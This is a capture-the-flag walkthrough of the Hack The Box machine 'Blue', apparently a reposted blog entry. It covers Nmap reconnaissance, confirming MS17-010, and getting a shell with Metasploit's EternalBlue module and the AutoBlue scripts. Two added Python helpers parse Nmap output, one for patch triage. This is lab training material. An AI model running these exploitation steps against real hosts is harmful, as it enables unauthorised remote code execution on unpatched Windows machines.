Blue Walkthrough Hack The Box

This document summarizes the steps taken to hack a Hack The Box machine called "Blue" using the EternalBlue exploit for the MS17-010 vulnerability. The summary is: 1. An Nmap scan revealed ports 139, 135, and 445 were open, and the OS was identified as Windows 7 SP1. 2. An Nmap script scan showed the machine was vulnerable to MS17-010. 3. The EternalBlue exploit from Metasploit was used to get an initial shell. 4. The AutoBlue exploit tool was also used to manually exploit MS17-010 and get a meterpreter shell. 5. The root and user flags were retrieved from

Blue Walkthrough Hack The Box

Rakshan Sharma · Aug 31, 2020
So, this is an easy machine and the name of the machine really is a
giveaway, but it is still a great machine simply because of how common
ms17-010 is and how far-reaching it really is. A lot of exploits that
don't seem to be connected rely on it. Anyways, let's get to the
machine walkthrough.

Let’s have some fun.


Firstly, I started with a simple nmap scan using the command:

nmap -p- -T4 10.10.10.40 | grep open

From this I got the following ports:

139, 135, 445, 49152, 49153, 49154, 49155, 49156, 49157
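As an added example (not code from the original post), here is a small Python helper for the step between the two scans: it reads the lines that `grep open` leaves over from the full sweep, drops duplicates and unconfirmed `open|filtered` states (which a bare `grep open` also matches), and compresses the result into the `-p` argument for the follow-up `-A` scan. The sample lines are constructed to mirror this host; the `8080/tcp open|filtered` line is invented to show the filter at work.

```python
"""Added example (not code from the original post): turn the `grep open`
output of a full nmap port sweep into a deduplicated port list and the
compact `-p` spec for the follow-up `-A` scan."""
from __future__ import annotations

import re

# Constructed sample in the shape `nmap -p- ... | grep open` prints for this
# host. 49154 is repeated and the 8080 line is invented on purpose, to show
# that duplicates collapse and unconfirmed states are skipped.
SAMPLE_GREP_OUTPUT = """\
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
8080/tcp  open|filtered http-proxy
"""

# Only a bare "open" state counts; "open|filtered" means nmap could not
# confirm the port, so it is left out of the targeted scan.
PORT_LINE = re.compile(r"^(\d{1,5})/(?:tcp|udp)\s+open(?:\s|$)")


def parse_open_ports(text: str) -> list[int]:
    """Return the sorted, deduplicated list of confirmed-open ports."""
    ports: set[int] = set()
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.add(int(m.group(1)))
    return sorted(ports)


def compact_port_spec(ports: list[int]) -> str:
    """Collapse runs of consecutive ports into nmap ranges: [1,2,3,5] -> '1-3,5'."""
    ordered = sorted(set(ports))
    spec: list[str] = []
    i = 0
    while i < len(ordered):
        start = ordered[i]
        # extend the run while the next port is exactly one higher
        while i + 1 < len(ordered) and ordered[i + 1] == ordered[i] + 1:
            i += 1
        end = ordered[i]
        spec.append(str(start) if start == end else f"{start}-{end}")
        i += 1
    return ",".join(spec)


def followup_command(target: str, grep_output: str) -> str:
    """Build the service/OS detection scan restricted to the confirmed ports."""
    return f"nmap -A -T4 -p{compact_port_spec(parse_open_ports(grep_output))} {target}"


if __name__ == "__main__":
    print(followup_command("10.10.10.40", SAMPLE_GREP_OUTPUT))
```

Feeding the real grep output through `followup_command` gives the same `-p135,139,445,49152-49157` list the scan below uses, minus the hand-typed duplicate.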

After this, I ran a complete scan using -A on the open ports:

nmap -A -p139,135,445,49152-49157 -T4 10.10.10.40

Nmap scan report for 10.10.10.40
Host is up (0.21s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 Professional SP1 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows Vista or Windows 7 SP1 (96%), Microsoft Windows Vista SP0 - SP2, Windows Server 2008, or Windows 7 Ultimate (96%), Microsoft Windows Vista SP2, Windows 7, or Windows 7 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -15m45s, deviation: 34m36s, median: 4m13s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-08-31T11:00:35+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-31T10:00:37
|_  start_date: 2020-08-31T09:56:52

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   251.99 ms 10.10.14.1
2   252.06 ms 10.10.10.40

I always first exhaust the common ports before moving to less common
ports such as 49152 and the rest, so I'm gonna start with the top 3
ports (135, 139 and 445). This scan also gives us the OS of the system,
Windows 7 Professional SP1, in the smb-os-discovery output.

For good habit, you should also run an nmap on UDP ports using the -sU
flag, but since this is a walkthrough, I'm gonna forgo going down that
route since it yields no useful information.

After this, I also ran a script vulnerability scan on the top 3 ports.

nmap -p139,135,445 --script vuln 10.10.10.40

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

So, the host is vulnerable to ms17-010.
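Reading one report by eye is fine for a single box, but the same `--script vuln` output is what a defender would run across a whole subnet to find the machines that still answer as vulnerable. As an added example (not code from the original post), the Python below parses nmap's text output for the `smb-vuln-ms17-010` and `smb-security-mode` scripts into a per-host triage record and lists the hosts to patch first. The first sample host is modelled on the output above (with nmap's own indentation restored); the second host, 10.10.10.41, is invented here as the patched case.

```python
"""Added example (not code from the original post): reduce the text output
of `nmap --script vuln` (plus the smb-security-mode script) to a per-host
triage record, so a sweep over many hosts can be sorted into "still flagged
as MS17-010 VULNERABLE / SMB signing disabled" without reading each report."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: the first host mirrors the post's output for
# 10.10.10.40; the second host is invented as the patched case. By default
# the smb-vuln-ms17-010 script prints nothing for a host it does not flag,
# so the patched host simply has no ms17-010 block at all.
SAMPLE_REPORTS = """\
Nmap scan report for 10.10.10.40
Host is up (0.21s latency).

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap scan report for 10.10.10.41
Host is up (0.20s latency).

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_smb-vuln-ms10-054: false
"""

# A top-level script name in nmap's gutter: lower-case and containing a
# dash, e.g. "smb-security-mode:" or "smb-vuln-ms17-010:". Nested fields
# like "State:" or "message_signing:" do not match, nor do URLs.
SCRIPT_HEADER = re.compile(r"^([a-z][a-z0-9]*(?:-[a-z0-9]+)+):")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class HostTriage:
    host: str
    ms17_010_state: str = "not reported"
    cves: list[str] = field(default_factory=list)
    risk: str = ""
    message_signing: str = "unknown"

    @property
    def needs_patch(self) -> bool:
        return self.ms17_010_state == "VULNERABLE"

    @property
    def signing_weak(self) -> bool:
        # "disabled" is the SMB1 wording, "enabled but not required" the SMB2 one
        return self.message_signing.startswith("disabled") or "not required" in self.message_signing


def parse_reports(text: str) -> list[HostTriage]:
    """Walk the report line by line, tracking which script block we are in."""
    records: list[HostTriage] = []
    current: HostTriage | None = None
    section = ""
    for raw in text.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", raw)
        if m:
            current = HostTriage(host=m.group(1))
            records.append(current)
            section = ""
            continue
        if current is None or not raw.startswith("|"):
            continue
        line = raw.lstrip("|_ ").rstrip()  # drop nmap's "|" / "|_" gutter and indentation
        header = SCRIPT_HEADER.match(line)
        if header:
            section = header.group(1)
            continue
        if section == "smb-vuln-ms17-010":
            if line.startswith("State:"):
                current.ms17_010_state = line.split(":", 1)[1].strip()
            elif line.startswith("IDs:"):
                current.cves = CVE_RE.findall(line)
            elif line.startswith("Risk factor:"):
                current.risk = line.split(":", 1)[1].strip()
        elif section == "smb-security-mode" and line.startswith("message_signing:"):
            current.message_signing = line.split(":", 1)[1].strip()
    return records


def hosts_to_patch(records: list[HostTriage]) -> list[str]:
    """Hosts the script still flags as MS17-010 VULNERABLE, in report order."""
    return [r.host for r in records if r.needs_patch]


if __name__ == "__main__":
    for rec in parse_reports(SAMPLE_REPORTS):
        print(rec.host, rec.ms17_010_state, rec.cves, "signing weak:", rec.signing_weak)
    print("patch first:", hosts_to_patch(parse_reports(SAMPLE_REPORTS)))
```

The parser keys off line content rather than column position, so it also copes with output whose indentation has been flattened, as in the copy of the scan above. `signing_weak` is reported separately from `needs_patch` because disabled SMB signing is a standing weakness on its own, independent of whether the MS17-010 patch is present.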

RPC (Dead-end) PORT 135

Let's just go port by port. First up is 135, which is msrpc. Just by
running the following command, I ruled out rpc as it refused a
connection altogether.

rpcinfo -p 10.10.10.40

10.10.10.40: RPC: Remote system error - Connection refused

By no means is this the only command worth running for rpc, but since
we already have a vulnerability to exploit, we can forgo going through
some advanced script testing on rpc.

So that's it for rpc.

SMB (ms17-010) PORT 139,445

Ok, so from the nmap script vulnerability scanner we know that the
host is vulnerable to ms17-010. Let's find out what that is.

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

Looks like it allows for remote code execution.

After a little bit of googling I found out that it's a remote buffer
overflow that can potentially open a shell. After a bit more googling,
I found a Rapid7 search result, which means there is probably an
exploit in Metasploit for this.

https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue

Now, I fired up msfconsole and searched for ms17-010:

search ms17-010

Search result for ms17-010

Looks like there is a scanner that can confirm the vulnerability. Let's
quickly run that and confirm our suspicions.

use auxiliary/scanner/smb/smb_ms17_010

I quickly ran the scanner and it looks like the host is vulnerable to
ms17-010.

Exploiting ms17-010 using Metasploit

use exploit/windows/smb/ms17_010_eternalblue

Just setting the parameters

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

Success!!!

And we're in.

So we successfully got in and all, but this was no fun; all we did was
find an exploit and type run. Let's do it a bit more manually.

Exploiting ms17-010 using AutoBlue

Get the exploit from github using the following command. If you do
not have git installed, simply run apt install git to get git.

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

By default, none of the scripts will have execution privilege, so we
need to change their permissions. Now, we don't need all the scripts
for this attack, so let's start by checking what's what.

Auto Blue Files

Run these commands to change the permissions on the files we need to
execute.

Now, on my machine, listener_prep.sh already came with execution
privileges, but if it doesn't for you, then simply run:

chmod 777 listener_prep.sh

python eternal_checker.py 10.10.10.40

Not patched means vulnerable

Now, we need to create a shell. We can do that ourselves using
msfvenom or we can use the included shell_prep script.

cd shellcode

./shell_prep.sh

The stuff in red is written by me

We're after inet

cd ..

./listener_prep.sh

Preparing our listener

Started

Simply run

python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin

Success

So, wait for some time after this and you should get a meterpreter
shell open.

We're in

Finding the flags

Flags

cd ../../Users/Administrator/Desktop

type root.txt

cd ../../haris/Desktop

type user.txt

https://medium.com/@rakshan793/blue-walkthrough-hack-the-box-7d5a87db5dbe